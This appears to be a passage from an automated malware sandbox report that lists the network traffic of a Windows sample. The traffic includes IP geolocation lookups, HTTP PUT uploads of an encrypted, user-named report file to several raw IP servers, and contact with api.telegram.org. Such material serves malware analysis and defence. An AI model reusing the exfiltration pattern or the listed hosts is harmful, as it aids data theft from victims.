Mar 17, 2025 12:28:44.223454952 CET	60236	80	192.168.2.8	45.82.65.63
Mar 17, 2025 12:28:44.276458979 CET	80	60236	45.82.65.63	192.168.2.8
Mar 17, 2025 12:28:44.276601076 CET	60236	80	192.168.2.8	45.82.65.63
Mar 17, 2025 12:28:44.328401089 CET	80	60236	45.82.65.63	192.168.2.8
Mar 17, 2025 12:28:44.331914902 CET	60236	80	192.168.2.8	45.82.65.63
Mar 17, 2025 12:28:44.384416103 CET	80	60236	45.82.65.63	192.168.2.8
Mar 17, 2025 12:28:44.387928009 CET	60236	80	192.168.2.8	45.82.65.63
Mar 17, 2025 12:28:44.440181971 CET	80	60236	45.82.65.63	192.168.2.8
Mar 17, 2025 12:28:44.443907022 CET	60236	80	192.168.2.8	45.82.65.63
Mar 17, 2025 12:28:44.496711016 CET	80	60236	45.82.65.63	192.168.2.8
Mar 17, 2025 12:28:44.496834993 CET	60236	80	192.168.2.8	45.82.65.63
Mar 17, 2025 12:28:44.547688961 CET	80	60236	45.82.65.63	192.168.2.8
Mar 17, 2025 12:28:44.547816992 CET	60236	80	192.168.2.8	45.82.65.63
Mar 17, 2025 12:28:44.595463037 CET	80	60236	45.82.65.63	192.168.2.8
Mar 17, 2025 12:28:44.595921993 CET	60236	80	192.168.2.8	45.82.65.63
Mar 17, 2025 12:28:44.648616076 CET	80	60236	45.82.65.63	192.168.2.8
Mar 17, 2025 12:28:44.652115107 CET	60236	80	192.168.2.8	45.82.65.63
Mar 17, 2025 12:28:44.699395895 CET	80	60236	45.82.65.63	192.168.2.8
Mar 17, 2025 12:28:44.699512959 CET	60236	80	192.168.2.8	45.82.65.63
Mar 17, 2025 12:28:44.751379967 CET	80	60236	45.82.65.63	192.168.2.8
Mar 17, 2025 12:28:44.751461983 CET	60236	80	192.168.2.8	45.82.65.63
Mar 17, 2025 12:28:44.799441099 CET	80	60236	45.82.65.63	192.168.2.8
Mar 17, 2025 12:28:44.799638033 CET	60236	80	192.168.2.8	45.82.65.63
Mar 17, 2025 12:28:44.847520113 CET	80	60236	45.82.65.63	192.168.2.8
Mar 17, 2025 12:28:44.847683907 CET	60236	80	192.168.2.8	45.82.65.63
Mar 17, 2025 12:28:44.895394087 CET	80	60236	45.82.65.63	192.168.2.8
Mar 17, 2025 12:28:44.895479918 CET	60236	80	192.168.2.8	45.82.65.63
Mar 17, 2025 12:28:44.897167921 CET	80	60236	45.82.65.63	192.168.2.8
Mar 17, 2025 12:28:44.899826050 CET	60237	443	192.168.2.8	5.196.181.135
Mar 17, 2025 12:28:44.899871111 CET	443	60237	5.196.181.135	192.168.2.8
Mar 17, 2025 12:28:44.901869059 CET	80	60236	45.82.65.63	192.168.2.8
Mar 17, 2025 12:28:44.901984930 CET	60237	443	192.168.2.8	5.196.181.135
Mar 17, 2025 12:28:44.911829948 CET	60237	443	192.168.2.8	5.196.181.135
Mar 17, 2025 12:28:44.911854982 CET	443	60237	5.196.181.135	192.168.2.8
Mar 17, 2025 12:28:45.557964087 CET	443	60237	5.196.181.135	192.168.2.8
Mar 17, 2025 12:28:45.558073997 CET	60237	443	192.168.2.8	5.196.181.135
Mar 17, 2025 12:28:45.560787916 CET	60237	443	192.168.2.8	5.196.181.135
Mar 17, 2025 12:28:45.560796976 CET	443	60237	5.196.181.135	192.168.2.8
Mar 17, 2025 12:28:45.561058044 CET	443	60237	5.196.181.135	192.168.2.8
Mar 17, 2025 12:28:45.615139961 CET	60237	443	192.168.2.8	5.196.181.135
Mar 17, 2025 12:28:45.738549948 CET	60237	443	192.168.2.8	5.196.181.135
Mar 17, 2025 12:28:45.738955975 CET	443	60237	5.196.181.135	192.168.2.8
Mar 17, 2025 12:28:45.739027023 CET	60237	443	192.168.2.8	5.196.181.135
Mar 17, 2025 12:28:45.744093895 CET	60237	443	192.168.2.8	5.196.181.135
Mar 17, 2025 12:28:45.744115114 CET	443	60237	5.196.181.135	192.168.2.8
Mar 17, 2025 12:28:45.745089054 CET	60238	80	192.168.2.8	95.216.147.179
Mar 17, 2025 12:28:45.750010967 CET	80	60238	95.216.147.179	192.168.2.8
Mar 17, 2025 12:28:45.750102997 CET	60238	80	192.168.2.8	95.216.147.179
Mar 17, 2025 12:28:45.750344992 CET	60238	80	192.168.2.8	95.216.147.179
Mar 17, 2025 12:28:45.754976034 CET	80	60238	95.216.147.179	192.168.2.8
Mar 17, 2025 12:28:46.099848032 CET	60238	80	192.168.2.8	95.216.147.179
Mar 17, 2025 12:28:46.105077982 CET	80	60238	95.216.147.179	192.168.2.8
Mar 17, 2025 12:28:46.105089903 CET	80	60238	95.216.147.179	192.168.2.8
Mar 17, 2025 12:28:46.105101109 CET	80	60238	95.216.147.179	192.168.2.8
Mar 17, 2025 12:28:46.105109930 CET	80	60238	95.216.147.179	192.168.2.8
Mar 17, 2025 12:28:46.105129957 CET	80	60238	95.216.147.179	192.168.2.8
Mar 17, 2025 12:28:46.105139017 CET	80	60238	95.216.147.179	192.168.2.8
Mar 17, 2025 12:28:46.105149984 CET	80	60238	95.216.147.179	192.168.2.8
Mar 17, 2025 12:28:46.105158091 CET	60238	80	192.168.2.8	95.216.147.179
Mar 17, 2025 12:28:46.105206013 CET	60238	80	192.168.2.8	95.216.147.179
Mar 17, 2025 12:28:46.105287075 CET	60238	80	192.168.2.8	95.216.147.179
Mar 17, 2025 12:28:46.105750084 CET	80	60238	95.216.147.179	192.168.2.8
Mar 17, 2025 12:28:46.105825901 CET	80	60238	95.216.147.179	192.168.2.8
Mar 17, 2025 12:28:46.105889082 CET	80	60238	95.216.147.179	192.168.2.8
Mar 17, 2025 12:28:46.105894089 CET	60238	80	192.168.2.8	95.216.147.179
Mar 17, 2025 12:28:46.105943918 CET	60238	80	192.168.2.8	95.216.147.179
Mar 17, 2025 12:28:46.110765934 CET	80	60238	95.216.147.179	192.168.2.8
Mar 17, 2025 12:28:46.110778093 CET	80	60238	95.216.147.179	192.168.2.8
Mar 17, 2025 12:28:46.110786915 CET	80	60238	95.216.147.179	192.168.2.8
Mar 17, 2025 12:28:46.110796928 CET	80	60238	95.216.147.179	192.168.2.8
Mar 17, 2025 12:28:46.110805988 CET	80	60238	95.216.147.179	192.168.2.8
Mar 17, 2025 12:28:46.110815048 CET	80	60238	95.216.147.179	192.168.2.8
Mar 17, 2025 12:28:46.110857010 CET	60238	80	192.168.2.8	95.216.147.179
Mar 17, 2025 12:28:46.110954046 CET	60238	80	192.168.2.8	95.216.147.179
Mar 17, 2025 12:28:46.151618958 CET	80	60238	95.216.147.179	192.168.2.8
Mar 17, 2025 12:28:46.152009964 CET	60238	80	192.168.2.8	95.216.147.179
Mar 17, 2025 12:28:46.199404001 CET	80	60238	95.216.147.179	192.168.2.8
Mar 17, 2025 12:28:46.199498892 CET	60238	80	192.168.2.8	95.216.147.179
Mar 17, 2025 12:28:46.212018967 CET	80	60238	95.216.147.179	192.168.2.8
Mar 17, 2025 12:28:46.212219954 CET	60238	80	192.168.2.8	95.216.147.179
Mar 17, 2025 12:28:46.216979027 CET	80	60238	95.216.147.179	192.168.2.8
Mar 17, 2025 12:28:46.216990948 CET	80	60238	95.216.147.179	192.168.2.8
Mar 17, 2025 12:28:46.217030048 CET	80	60238	95.216.147.179	192.168.2.8
Mar 17, 2025 12:28:46.217041016 CET	80	60238	95.216.147.179	192.168.2.8
Mar 17, 2025 12:28:46.217061996 CET	60238	80	192.168.2.8	95.216.147.179
Mar 17, 2025 12:28:46.217107058 CET	80	60238	95.216.147.179	192.168.2.8
Mar 17, 2025 12:28:46.217117071 CET	80	60238	95.216.147.179	192.168.2.8
Mar 17, 2025 12:28:46.217123032 CET	80	60238	95.216.147.179	192.168.2.8
Mar 17, 2025 12:28:46.217149019 CET	60238	80	192.168.2.8	95.216.147.179
Mar 17, 2025 12:28:46.217154980 CET	80	60238	95.216.147.179	192.168.2.8
Mar 17, 2025 12:28:46.217192888 CET	60238	80	192.168.2.8	95.216.147.179
Mar 17, 2025 12:28:46.217220068 CET	80	60238	95.216.147.179	192.168.2.8
Mar 17, 2025 12:28:46.217230082 CET	80	60238	95.216.147.179	192.168.2.8
Mar 17, 2025 12:28:46.217255116 CET	80	60238	95.216.147.179	192.168.2.8
Mar 17, 2025 12:28:46.217415094 CET	80	60238	95.216.147.179	192.168.2.8
Mar 17, 2025 12:28:46.217426062 CET	80	60238	95.216.147.179	192.168.2.8
Mar 17, 2025 12:28:46.217432976 CET	80	60238	95.216.147.179	192.168.2.8
Mar 17, 2025 12:28:46.217479944 CET	80	60238	95.216.147.179	192.168.2.8
Mar 17, 2025 12:28:46.217562914 CET	80	60238	95.216.147.179	192.168.2.8
Mar 17, 2025 12:28:46.217642069 CET	80	60238	95.216.147.179	192.168.2.8
Mar 17, 2025 12:28:46.217691898 CET	80	60238	95.216.147.179	192.168.2.8
Mar 17, 2025 12:28:46.217703104 CET	80	60238	95.216.147.179	192.168.2.8
Mar 17, 2025 12:28:46.217745066 CET	80	60238	95.216.147.179	192.168.2.8
Mar 17, 2025 12:28:46.217809916 CET	80	60238	95.216.147.179	192.168.2.8
Mar 17, 2025 12:28:46.217819929 CET	80	60238	95.216.147.179	192.168.2.8
Mar 17, 2025 12:28:46.217832088 CET	80	60238	95.216.147.179	192.168.2.8
Mar 17, 2025 12:28:46.217875957 CET	80	60238	95.216.147.179	192.168.2.8
Mar 17, 2025 12:28:46.217956066 CET	80	60238	95.216.147.179	192.168.2.8
Mar 17, 2025 12:28:46.221785069 CET	80	60238	95.216.147.179	192.168.2.8
Mar 17, 2025 12:28:46.221831083 CET	80	60238	95.216.147.179	192.168.2.8
Mar 17, 2025 12:28:46.221889973 CET	80	60238	95.216.147.179	192.168.2.8
Mar 17, 2025 12:28:46.222007990 CET	80	60238	95.216.147.179	192.168.2.8
Mar 17, 2025 12:28:46.222073078 CET	80	60238	95.216.147.179	192.168.2.8
Mar 17, 2025 12:28:46.407793045 CET	80	60238	95.216.147.179	192.168.2.8
Mar 17, 2025 12:28:46.415869951 CET	60239	8080	192.168.2.8	185.217.98.121
Mar 17, 2025 12:28:46.421204090 CET	8080	60239	185.217.98.121	192.168.2.8
Mar 17, 2025 12:28:46.421334982 CET	60239	8080	192.168.2.8	185.217.98.121
Mar 17, 2025 12:28:46.421493053 CET	60239	8080	192.168.2.8	185.217.98.121
Mar 17, 2025 12:28:46.426486969 CET	8080	60239	185.217.98.121	192.168.2.8
Mar 17, 2025 12:28:46.458909035 CET	60238	80	192.168.2.8	95.216.147.179
Mar 17, 2025 12:28:46.771837950 CET	60239	8080	192.168.2.8	185.217.98.121
Mar 17, 2025 12:28:46.836601973 CET	8080	60239	185.217.98.121	192.168.2.8
Mar 17, 2025 12:28:46.836654902 CET	8080	60239	185.217.98.121	192.168.2.8
Mar 17, 2025 12:28:46.836664915 CET	8080	60239	185.217.98.121	192.168.2.8
Mar 17, 2025 12:28:46.836740017 CET	60239	8080	192.168.2.8	185.217.98.121
Mar 17, 2025 12:28:46.836849928 CET	8080	60239	185.217.98.121	192.168.2.8
Mar 17, 2025 12:28:46.836883068 CET	8080	60239	185.217.98.121	192.168.2.8
Mar 17, 2025 12:28:46.836905956 CET	60239	8080	192.168.2.8	185.217.98.121
Mar 17, 2025 12:28:46.836942911 CET	8080	60239	185.217.98.121	192.168.2.8
Mar 17, 2025 12:28:46.836952925 CET	8080	60239	185.217.98.121	192.168.2.8
Mar 17, 2025 12:28:46.836992979 CET	60239	8080	192.168.2.8	185.217.98.121
Mar 17, 2025 12:28:46.837018013 CET	8080	60239	185.217.98.121	192.168.2.8
Mar 17, 2025 12:28:46.837028980 CET	8080	60239	185.217.98.121	192.168.2.8
Mar 17, 2025 12:28:46.837058067 CET	60239	8080	192.168.2.8	185.217.98.121
Mar 17, 2025 12:28:46.837119102 CET	8080	60239	185.217.98.121	192.168.2.8
Mar 17, 2025 12:28:46.837198019 CET	60239	8080	192.168.2.8	185.217.98.121
Mar 17, 2025 12:28:46.837243080 CET	60239	8080	192.168.2.8	185.217.98.121
Mar 17, 2025 12:28:46.842016935 CET	8080	60239	185.217.98.121	192.168.2.8
Mar 17, 2025 12:28:46.842029095 CET	8080	60239	185.217.98.121	192.168.2.8
Mar 17, 2025 12:28:46.842047930 CET	8080	60239	185.217.98.121	192.168.2.8
Mar 17, 2025 12:28:46.842057943 CET	8080	60239	185.217.98.121	192.168.2.8
Mar 17, 2025 12:28:46.842106104 CET	8080	60239	185.217.98.121	192.168.2.8
Mar 17, 2025 12:28:46.842116117 CET	8080	60239	185.217.98.121	192.168.2.8
Mar 17, 2025 12:28:46.842130899 CET	60239	8080	192.168.2.8	185.217.98.121
Mar 17, 2025 12:28:46.842247963 CET	60239	8080	192.168.2.8	185.217.98.121
Mar 17, 2025 12:28:46.887404919 CET	8080	60239	185.217.98.121	192.168.2.8
Mar 17, 2025 12:28:46.887962103 CET	60239	8080	192.168.2.8	185.217.98.121
Mar 17, 2025 12:28:46.910398006 CET	8080	60239	185.217.98.121	192.168.2.8
Mar 17, 2025 12:28:46.910572052 CET	60239	8080	192.168.2.8	185.217.98.121
Mar 17, 2025 12:28:46.915349007 CET	8080	60239	185.217.98.121	192.168.2.8
Mar 17, 2025 12:28:46.915358067 CET	8080	60239	185.217.98.121	192.168.2.8
Mar 17, 2025 12:28:46.915374994 CET	8080	60239	185.217.98.121	192.168.2.8
Mar 17, 2025 12:28:46.915379047 CET	8080	60239	185.217.98.121	192.168.2.8
Mar 17, 2025 12:28:46.915484905 CET	8080	60239	185.217.98.121	192.168.2.8
Mar 17, 2025 12:28:46.915488958 CET	8080	60239	185.217.98.121	192.168.2.8
Mar 17, 2025 12:28:46.915493011 CET	8080	60239	185.217.98.121	192.168.2.8
Mar 17, 2025 12:28:46.915498972 CET	8080	60239	185.217.98.121	192.168.2.8
Mar 17, 2025 12:28:46.915503025 CET	8080	60239	185.217.98.121	192.168.2.8
Mar 17, 2025 12:28:46.915519953 CET	60239	8080	192.168.2.8	185.217.98.121
Mar 17, 2025 12:28:46.915581942 CET	8080	60239	185.217.98.121	192.168.2.8
Mar 17, 2025 12:28:46.915585995 CET	8080	60239	185.217.98.121	192.168.2.8
Mar 17, 2025 12:28:46.915590048 CET	8080	60239	185.217.98.121	192.168.2.8
Mar 17, 2025 12:28:46.915594101 CET	8080	60239	185.217.98.121	192.168.2.8
Mar 17, 2025 12:28:46.915608883 CET	8080	60239	185.217.98.121	192.168.2.8
Mar 17, 2025 12:28:46.915610075 CET	60239	8080	192.168.2.8	185.217.98.121
Mar 17, 2025 12:28:46.915626049 CET	8080	60239	185.217.98.121	192.168.2.8
Mar 17, 2025 12:28:46.915705919 CET	8080	60239	185.217.98.121	192.168.2.8
Mar 17, 2025 12:28:46.915709972 CET	8080	60239	185.217.98.121	192.168.2.8
Mar 17, 2025 12:28:46.915721893 CET	8080	60239	185.217.98.121	192.168.2.8
Mar 17, 2025 12:28:46.915834904 CET	8080	60239	185.217.98.121	192.168.2.8
Mar 17, 2025 12:28:46.915900946 CET	8080	60239	185.217.98.121	192.168.2.8
Mar 17, 2025 12:28:46.915904999 CET	8080	60239	185.217.98.121	192.168.2.8
Mar 17, 2025 12:28:46.915910006 CET	8080	60239	185.217.98.121	192.168.2.8
Mar 17, 2025 12:28:46.915993929 CET	8080	60239	185.217.98.121	192.168.2.8
Mar 17, 2025 12:28:46.915998936 CET	8080	60239	185.217.98.121	192.168.2.8
Mar 17, 2025 12:28:46.916007996 CET	8080	60239	185.217.98.121	192.168.2.8
Mar 17, 2025 12:28:46.916034937 CET	8080	60239	185.217.98.121	192.168.2.8
Mar 17, 2025 12:28:46.916078091 CET	8080	60239	185.217.98.121	192.168.2.8
Mar 17, 2025 12:28:46.916081905 CET	8080	60239	185.217.98.121	192.168.2.8
Mar 17, 2025 12:28:46.920315981 CET	8080	60239	185.217.98.121	192.168.2.8
Mar 17, 2025 12:28:46.920370102 CET	8080	60239	185.217.98.121	192.168.2.8
Mar 17, 2025 12:28:46.920392036 CET	8080	60239	185.217.98.121	192.168.2.8
Mar 17, 2025 12:28:46.920466900 CET	8080	60239	185.217.98.121	192.168.2.8
Mar 17, 2025 12:28:46.920490026 CET	8080	60239	185.217.98.121	192.168.2.8
Mar 17, 2025 12:28:46.920552015 CET	8080	60239	185.217.98.121	192.168.2.8
Mar 17, 2025 12:28:47.131007910 CET	8080	60239	185.217.98.121	192.168.2.8
Mar 17, 2025 12:28:47.177678108 CET	60239	8080	192.168.2.8	185.217.98.121
Mar 17, 2025 12:28:47.534163952 CET	8080	60239	185.217.98.121	192.168.2.8
Mar 17, 2025 12:28:47.538012028 CET	60238	80	192.168.2.8	95.216.147.179
Mar 17, 2025 12:28:47.538075924 CET	60239	8080	192.168.2.8	185.217.98.121
Mar 17, 2025 12:28:47.543256998 CET	80	60238	95.216.147.179	192.168.2.8
Mar 17, 2025 12:28:47.543277025 CET	8080	60239	185.217.98.121	192.168.2.8
Mar 17, 2025 12:28:47.543313980 CET	60238	80	192.168.2.8	95.216.147.179
Mar 17, 2025 12:28:47.543344021 CET	60239	8080	192.168.2.8	185.217.98.121
Mar 17, 2025 12:28:47.546382904 CET	60240	443	192.168.2.8	149.154.167.220
Mar 17, 2025 12:28:47.546416998 CET	443	60240	149.154.167.220	192.168.2.8
Mar 17, 2025 12:28:47.546483040 CET	60240	443	192.168.2.8	149.154.167.220
Mar 17, 2025 12:28:47.546855927 CET	60240	443	192.168.2.8	149.154.167.220
Mar 17, 2025 12:28:47.546870947 CET	443	60240	149.154.167.220	192.168.2.8
Mar 17, 2025 12:28:48.178481102 CET	443	60240	149.154.167.220	192.168.2.8
Mar 17, 2025 12:28:48.178680897 CET	60240	443	192.168.2.8	149.154.167.220
Mar 17, 2025 12:28:48.180778027 CET	60240	443	192.168.2.8	149.154.167.220
Mar 17, 2025 12:28:48.180789948 CET	443	60240	149.154.167.220	192.168.2.8
Mar 17, 2025 12:28:48.181041956 CET	443	60240	149.154.167.220	192.168.2.8
Mar 17, 2025 12:28:48.187757015 CET	60240	443	192.168.2.8	149.154.167.220
Mar 17, 2025 12:28:48.228332996 CET	443	60240	149.154.167.220	192.168.2.8
Mar 17, 2025 12:28:48.548470974 CET	443	60240	149.154.167.220	192.168.2.8
Mar 17, 2025 12:28:48.548559904 CET	443	60240	149.154.167.220	192.168.2.8
Mar 17, 2025 12:28:48.549612045 CET	60240	443	192.168.2.8	149.154.167.220
Mar 17, 2025 12:28:48.566037893 CET	60240	443	192.168.2.8	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 17, 2025 12:27:14.994957924 CET	63425	53	192.168.2.8	1.1.1.1
Mar 17, 2025 12:27:15.006184101 CET	53	63425	1.1.1.1	192.168.2.8
Mar 17, 2025 12:27:45.466085911 CET	53	63157	162.159.36.2	192.168.2.8
Mar 17, 2025 12:27:45.970489025 CET	63297	53	192.168.2.8	1.1.1.1
Mar 17, 2025 12:27:45.979145050 CET	53	63297	1.1.1.1	192.168.2.8
Mar 17, 2025 12:28:47.538836956 CET	53845	53	192.168.2.8	1.1.1.1
Mar 17, 2025 12:28:47.545701027 CET	53	53845	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 17, 2025 12:27:14.994957924 CET	192.168.2.8	1.1.1.1	0x975c	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Mar 17, 2025 12:27:45.970489025 CET	192.168.2.8	1.1.1.1	0x18db	Standard query (0)	171.39.242.20.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Mar 17, 2025 12:28:47.538836956 CET	192.168.2.8	1.1.1.1	0x8c72	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 17, 2025 12:27:15.006184101 CET	1.1.1.1	192.168.2.8	0x975c	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Mar 17, 2025 12:27:45.979145050 CET	1.1.1.1	192.168.2.8	0x18db	Name error (3)	171.39.242.20.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Mar 17, 2025 12:28:47.545701027 CET	1.1.1.1	192.168.2.8	0x8c72	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.telegram.org

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49682	208.95.112.1	80	4296	C:\Users\user\Desktop\73ybGtnYXx.exe

Timestamp	Bytes transferred	Direction	Data
Mar 17, 2025 12:27:15.017497063 CET	85	OUT	GET /line?fields=query,country HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Mar 17, 2025 12:27:15.471684933 CET	197	IN	HTTP/1.1 200 OK Date: Mon, 17 Mar 2025 11:27:14 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 27 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 55 6e 69 74 65 64 20 53 74 61 74 65 73 0a 38 2e 34 36 2e 31 32 33 2e 31 38 39 0a Data Ascii: United States8.46.123.189

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49683	206.166.251.4	8080	4296	C:\Users\user\Desktop\73ybGtnYXx.exe

Timestamp	Bytes transferred	Direction	Data
Mar 17, 2025 12:27:15.894418955 CET	146	OUT	PUT /2r1j6_user%40358075_report.wsr HTTP/1.1 Host: 206.166.251.4:8080 Content-Length: 152401 Expect: 100-continue Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49689	167.99.138.249	8080	4296	C:\Users\user\Desktop\73ybGtnYXx.exe

Timestamp	Bytes transferred	Direction	Data
Mar 17, 2025 12:27:37.388029099 CET	147	OUT	PUT /2r1j6_user%40358075_report.wsr HTTP/1.1 Host: 167.99.138.249:8080 Content-Length: 152401 Expect: 100-continue Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	60233	46.4.73.118	9000	4296	C:\Users\user\Desktop\73ybGtnYXx.exe

Timestamp	Bytes transferred	Direction	Data
Mar 17, 2025 12:27:58.780046940 CET	144	OUT	PUT /2r1j6_user%40358075_report.wsr HTTP/1.1 Host: 46.4.73.118:9000 Content-Length: 152401 Expect: 100-continue Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	60234	206.189.109.146	80	4296	C:\Users\user\Desktop\73ybGtnYXx.exe

Timestamp	Bytes transferred	Direction	Data
Mar 17, 2025 12:28:00.498965025 CET	143	OUT	PUT /2r1j6_user%40358075_report.wsr HTTP/1.1 Host: 206.189.109.146 Content-Length: 152401 Expect: 100-continue Connection: Keep-Alive
Mar 17, 2025 12:28:00.849679947 CET	12360	OUT	Data Raw: 57 53 52 24 0f a4 28 04 89 b4 cd 36 7f 09 f9 a0 3c a7 02 79 d4 8d a3 80 8a fe a2 9b af 19 60 ef d1 d5 a9 38 d7 35 52 83 bf df f2 72 44 a9 1d aa ec 77 b0 f5 33 1d c3 7c 89 27 9f 0e 31 03 ba 53 84 44 5c 62 4e cf b3 41 eb 56 e8 c3 37 03 7b 7a 34 2c Data Ascii: WSR$(6<y`85RrDw3\|'1SD\bNAV7{z4,Y^=yjW.W'Jkvw21~i^zGQ0Ge5= [eRSo)iygM7B}X&#/F+p84/X`71k
Mar 17, 2025 12:28:00.854646921 CET	2472	OUT	Data Raw: 05 e1 66 c4 07 13 d9 13 6d 18 73 6f 0b ad 31 1d 09 55 e7 3f dc 5e 7a de 77 26 0b 95 8a 2b 01 99 93 d3 44 3f 15 f9 b7 b5 73 51 a9 86 9a dd 89 2f d9 70 18 2b 67 0f 92 a0 44 48 cd 18 8f 81 2a 6c d6 b8 cc c3 55 48 4a b0 77 8d 61 27 e0 67 a5 26 9e 95 Data Ascii: fmso1U?^zw&+D?sQ/p+gDH*lUHJwa'g&g5jipSE]4g}_{OwTx6KH(;@g\|v\&A]z/<QJW1Gv= $~$O2<\KN86}&ML8iZ&
Mar 17, 2025 12:28:00.854676962 CET	7416	OUT	Data Raw: 9c 41 a9 b1 65 7a dc cc f8 45 98 8c d4 ce e1 f1 95 b1 da 73 a6 e5 0d 9c 9e 39 6a 7a 64 f3 96 ca f4 a1 79 ad f8 df fc 7e b1 84 aa 45 04 e4 95 20 fd 41 e8 0e 22 c2 b2 f0 51 ef f5 ae b5 bd 3b 48 f3 b4 e5 0c 39 9c 36 39 e9 dc fa ba f8 01 5e 63 82 9d Data Ascii: AezEs9jzdy~E A"Q;H969^c2Tv{l77uYG4En)ML-}/>R$wpMzA1%)Xh0Q_Ihv1LFv9+:8\!IOj${H
Mar 17, 2025 12:28:00.854732037 CET	4944	OUT	Data Raw: 02 17 16 73 cd 7e 23 55 2b 39 8a 2c 40 96 4c d7 64 4f fd 19 6f 06 42 c4 f4 c3 aa 1c 45 a0 70 d6 a2 2c 52 45 39 3f fd 43 f7 35 6e f4 41 bc fe 4f 34 be ca b9 d3 30 58 4b 48 81 3e be 42 e5 0f c3 19 ff 20 ae b5 9a 4e ec 9e 35 69 7d 0e 56 d7 ce 0b 57 Data Ascii: s~#U+9,@LdOoBEp,RE9?C5nAO40XKH>B N5i}VWW\\k`FIs)6'Q% @\|qfjCPi/\7'1K?CzBI.Y,<2"tuA9;APjiPoMOF(HbX^4m
Mar 17, 2025 12:28:00.854753971 CET	9888	OUT	Data Raw: 6a a4 73 71 d7 10 31 cb fb ad 3a b0 3d b6 5d 0f fa c9 25 51 a6 dd e3 b6 ad 12 59 81 72 df 00 bc 41 73 50 75 e0 a1 c0 dd 9e f0 52 f4 c5 d7 34 68 05 19 cb 9e 35 b2 37 e8 f0 21 33 b6 92 e2 27 72 eb e6 13 c8 ca 09 0a 91 3a 9d 73 23 4f 90 f2 a1 57 99 Data Ascii: jsq1:=]%QYrAsPuR4h57!3'r:s#OWuhoMZ+Rmy7Lh5@ZS\|n6<!K!>^7X@2DVgQMe^/S+gPZZ\|XnEVK=+Y!#_Ca"?iV:bJ
Mar 17, 2025 12:28:00.859493017 CET	4944	OUT	Data Raw: 09 a7 82 15 6a b0 d0 9f 9b fa e3 f3 f4 be f2 7f 00 24 fa 41 91 63 23 16 df 62 85 26 48 81 93 6e 58 5f 8d 28 7c 65 d5 8f 36 e0 16 43 fe 7c 63 e0 69 56 b0 bd a6 34 83 1c f3 16 a0 75 eb 67 8f 41 2d a9 a7 65 a4 91 56 32 a5 7b 8a 17 2f c6 16 c4 65 f2 Data Ascii: j$Ac#b&HnX_(\|e6C\|ciV4ugA-eV2{/ey0Q3M-~GkB^D7>}Cz9$m)(HF{k>8\|VbAg5lndRV?H~#)H.+4&aowI~]&pau]C:>:BlmX
Mar 17, 2025 12:28:00.859534979 CET	9888	OUT	Data Raw: 50 44 0b 07 e8 37 9e e2 ac 60 06 72 34 4e 95 29 15 40 31 5d 10 a0 62 44 ad 4a fd 30 1f 37 4c ec ed d9 cd 50 02 35 28 44 d6 62 da d9 61 57 56 72 75 4c 23 71 61 ca fb 40 be 21 0e 80 fe 61 47 5a d4 39 bb f7 5b bb 77 58 a7 30 f9 cd b1 f7 09 2e e4 4c Data Ascii: PD7`r4N)@1]bDJ07LP5(DbaWVruL#qa@!aGZ9[wX0.L]/)0KIqNlv/+_#j}]jZ;\|WjK4VUo6-d67!,I6mY]@5eh-u?1<;B
Mar 17, 2025 12:28:00.860261917 CET	27192	OUT	Data Raw: 9b 45 42 a9 bc dc a5 f0 2c 65 e4 d8 d6 1b 58 e7 76 d5 8a 93 20 69 49 92 c4 55 d1 8b 33 26 c5 06 95 b8 67 1b 31 9b 89 40 fa 38 a0 93 70 12 f5 0b 0f 7c e7 36 37 43 1a 41 6a 64 6b 29 42 a4 7c 0f 92 b8 33 52 f6 db 8a 05 db 7e bc 30 20 60 7b e9 82 7a Data Ascii: EB,eXv iIU3&g1@8p\|67CAjdk)B\|3R~0 `{zu6,yV)W>x,V@i4KZz{8B8TDB&45{e}e9\i"Mz89`NFh?HzS\|zoE]Q6tJ~YJ*
Mar 17, 2025 12:28:00.911808014 CET	23484	OUT	Data Raw: 2d f7 23 fa 7a 5e b3 87 70 61 77 6f 36 19 c4 ab 7b e8 4e f3 74 af 68 b5 85 71 98 31 4d 3b ad 7b 38 2b f3 ae 9d b0 74 68 59 50 18 24 f2 01 db 83 f8 49 16 03 df 44 06 76 76 4d 4c 04 bb b3 3a bc de a0 5f af 07 60 ce a8 92 7e e7 09 e2 4d c8 2f 7b c6 Data Ascii: -#z^pawo6{Nthq1M;{8+thYP$IDvvML:_`~M/{h0,vII&^UM+:JCL3TCWs4{=&a{WBlnC8V1n_Fu"l;-Is:$!qJ]OY3"jEfxQ26S9,
Mar 17, 2025 12:28:00.963479996 CET	3708	OUT	Data Raw: 66 d6 cc f9 f6 20 ed 04 4d a8 7b 38 d7 ae 56 8e d5 6b ba 37 22 52 1a 2a f3 b8 b6 47 9b 2d d2 1b 5e e0 3b 4a 30 74 51 d3 9e f6 7d 0b 73 e4 5a e0 ff c9 be 13 cd 2a 96 67 e2 14 6d 9c eb 04 fd 92 af 6f 1b c0 91 00 df 17 7c a9 a9 f0 ef 73 7a 93 9c 36 Data Ascii: f M{8Vk7"RG-^;J0tQ}sZgmo\|sz6;hDV)*>BJXTN-__<+\e+Lh\@~2@Gm6/Hg^3q/\C)GC?%=U`o3LdEm%v,Y;>N

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
